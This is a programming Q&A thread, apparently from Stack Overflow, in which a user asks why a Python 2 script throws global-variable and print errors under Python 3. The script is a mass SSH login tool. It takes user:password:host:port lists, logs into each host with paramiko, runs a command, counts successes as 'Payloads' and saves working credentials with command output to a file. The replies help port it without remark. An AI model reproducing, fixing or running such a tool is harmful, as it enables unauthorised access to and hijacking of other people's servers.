# Program doesn't work due to global variables

Tags: python

Python program doesn't work due to global variables. It says global is used and cannot be used. I'm not sure how to fix this as global would be a good use.

```
#!/usr/bin/python
import sys, multiprocessing, time, socket, paramiko, warnings, re, os, select
from os import system
from multiprocessing import Value
from Queue import *
from sys import stdout

paramiko.util.log_to_file("/dev/null")
warnings.simplefilter(action="ignore", category=FutureWarning)

with open(sys.argv[1], "r") as fd:
    lines = fd.readlines()
cmd="ahhh"
system('clear')
print "\033[0m\033[2;49;35mHello \033[0m\033[1;49;96mRemake!\033[0m\n"

queue = Queue()
queue_count = 0

for ip in lines:
    queue_count += 1
    stdout.write("\r\033[0m\033[2;49;35m[\033[1;49;96m%d\033[0m\033[2;49;35m] \033[0m\033[1;49;96mAdded to queue for Scanning!\033[0m" % queue_count)
    stdout.flush()
    queue.put(ip)
print "\n"
print "\033[0m\033[2;49;35mHello \033[0m\033[1;49;96mScan ON!\033[0m\n"

CONEXIUNE = Value('i', 0)
TIMEOUT = Value('i', 0)
NOGOOD = Value('i', 0)
PAYLOAD = Value('i', 0)

def breaching(infovps):
    try:
        ssh = paramiko.SSHClient()
        bport = int(infovps[3])
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(infovps[2], port=bport, username=infovps[0], password=infovps[1], timeout=5)
        stdin, stdout, stderr = ssh.exec_command(cmd)
        time.sleep(10)
        ssh.close()
        global PAYLOAD
        with PAYLOAD.get_lock():
            PAYLOAD.value += 1
            string = infovps[0]+":"+infovps[1]+":"+infovps[2]+":"+infovps[3]+" - Info - "+"".join(stdout.readlines()).strip()
            gotline = " ".join(string.splitlines())
            file = open('Senpai-Princess', 'a')
            file.writelines(gotline+"\n")
            file.close()
        global CONEXIUNE
        with CONEXIUNE.get_lock():
            CONEXIUNE.value += 1
        print("\r\033[0m\033[2;49;35mScanned\033[0m\033[1;49;96m: \033[0m\033[1;49;96m[\033[0m\033[2;49;35m%d\033[0m\033[1;49;96m] \033[0m\033[2;49;35mPayloads\033[0m\033[1;49;96m: \033[0m\033[1;49;96m[\033[0m\033[2;49;35m%d\033[0m\033[1;49;96m] \033[0m\033[2;49;35mTimeouts\033[0m\033[1;49;96m: \033[0m\033[1;49;96m[\033[0m\033[2;49;35m%d\033[0m\033[1;49;96m] \033[0m\033[2;49;35mBad Password\033[0m\033[1;49;96m: \033[0m\033[1;49;96m[\033[0m\033[2;49;35m%d\033[0m\033[1;49;96m] \033[0m\033[2;49;35mUser Used\033[0m\033[1;49;96m: \033[0m\033[1;49;96m[\033[0m\033[2;49;35m%s\033[0m\033[1;49;96m]\x1b[0m\r"% (CONEXIUNE.value, PAYLOAD.value, TIMEOUT.value, NOGOOD.value, infovps[0]))
        return
    except paramiko.ssh_exception.AuthenticationException:
        global NOGOOD
        with NOGOOD.get_lock():
            NOGOOD.value += 1
        global CONEXIUNE
        with CONEXIUNE.get_lock():
            CONEXIUNE.value += 1
        return
    except socket.error:
        global TIMEOUT
        with TIMEOUT.get_lock():
            TIMEOUT.value += 1
        global CONEXIUNE
        with CONEXIUNE.get_lock():
            CONEXIUNE.value += 1
        return
    except:
        global TIMEOUT
        with TIMEOUT.get_lock():
            TIMEOUT.value += 1
        global CONEXIUNE
        with CONEXIUNE.get_lock():
            CONEXIUNE.value += 1
        pass

for line in lines:
    infovps = line.strip().split(":")
    multiprocessing.Process(target=breaching, args=(infovps,)).start()
```

When I run it as ./Princess on Ubuntu it says required file not found. When I run it as"python3 princess.py" I get global variable errors and parenthesis missing error.

Comment: There is case sensitivity in Ubuntu and also the suffix is important: so Princess is not the same as princess.py. The file "Princess" is not found as you have saved it as "princess.py". Therefore, if you want to run directly the script, do ./princess.py in command line/terminal and set the permission to executable (chmod +x princess.py). Unfortunately, your code is not written for python3 or somebody has forgotten to do print and parentheses () . Therefore the error I assume.

Comment: Please [edit] your question to include the exact error messages that you're getting. Include line numbers and indicate which lines of your code correspond to those line numbers. Don't paraphrase your error messages.

Answer (score 1):

This program is written using python2, but now it's out of support and you have python3. You can try using 2to3.py script to transform it. This will at least fix the parenthesis missing error. And you can update your question and post the error text, than I can help you  fix the other problems.